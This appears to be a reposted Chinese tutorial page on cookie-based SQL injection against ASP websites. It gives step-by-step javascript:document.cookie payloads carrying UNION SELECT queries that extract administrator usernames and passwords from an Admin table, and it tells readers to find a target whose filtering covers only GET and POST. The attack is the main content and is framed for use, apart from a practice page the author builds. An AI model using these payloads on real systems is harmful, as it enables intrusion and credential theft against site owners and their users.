-
客服电话
-
APP下载
迪恩网络APP
随时随地掌握行业动态
-
官方微信
扫描二维码
关注迪恩网络微信公众号
客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。
具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。 cookie值是连接后才保存到本机的,也就是关IE后. 前提条件:一、网站没有过滤cookie方式的注入。 二、需事前了解数据库的管理员表段名,计算一下注入文件数据库查询语句在数据库中的列数。 打开数据库,找到Product这个表名,计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password,呵呵没有注入文件,我们可以自己构造一个测试方便大家的理解。 构造如下简单注入ASP,当然我没作什么严格的过滤,也就是接受任何方式的提交。. //调用数据库连接文件 ") else %> //反回指针处的内容,选取的字段与管理员的用户密码类型要相同 找前图中的ID=55 构造联合查询语句 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 将6,2分别用username、password替换 来试试cookie注入。找个目标,注入点结构与前面相近就不再分析了,仅过滤了post与get注入. 步骤一:重新打开IE,先连接到需注入的网站http://127.0.0.1/nf,也就是去除前面的链接值。注意:不要直接在前面图中的链接处操作,可以会不成功噢。 步骤二:清空地址处IE,再次在地址中加入如下 javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin")) 再次清空IE打入http://127.0.0.1/nf/ProductShow.asp 步骤四:重复步骤一.注意此步骤必需操作,很多人失败就在这里。 步骤五:清空地址处IE,再次在地址中如下代码 javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1, username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin")) 步骤六、再次清空地址处IE。http://127.0.0.1/nf/ProductShow.asp 好了全文结束。 |
2022-08-15
2022-08-17
2022-09-23
2023-10-27
2022-08-18
六六分期app的软件客服如何联系?不知道吗?加qq群【895510560】即可!标题:六六分期
今天小编告诉大家如何处理win10系统火狐flash插件总是崩溃的问题,可能很多用户都不知
今天小编告诉大家如何对win10系统删除桌面回收站图标进行设置,可能很多用户都不知道
今天小编告诉大家如何对win10系统电脑设置节能降温的设置方法,想必大家都遇到过需要
我们在使用xp系统的过程中,经常需要对xp系统无线网络安装向导设置进行设置,可能很多
今天小编告诉大家如何处理win7系统玩cf老是与主机连接不稳定的问题,可能很多用户都不
电脑对日常生活的重要性小编就不多说了,可是一旦碰到win7系统设置cf烟雾头的问题,很
我们在日常使用电脑的时候,有的小伙伴们可能在打开应用的时候会遇见提示应用程序无法
今天小编告诉大家如何对win7系统打开vcf文件进行设置,可能很多用户都不知道怎么对win
今天小编告诉大家如何对win10系统s4开启USB调试模式进行设置,可能很多用户都不知道怎
请发表评论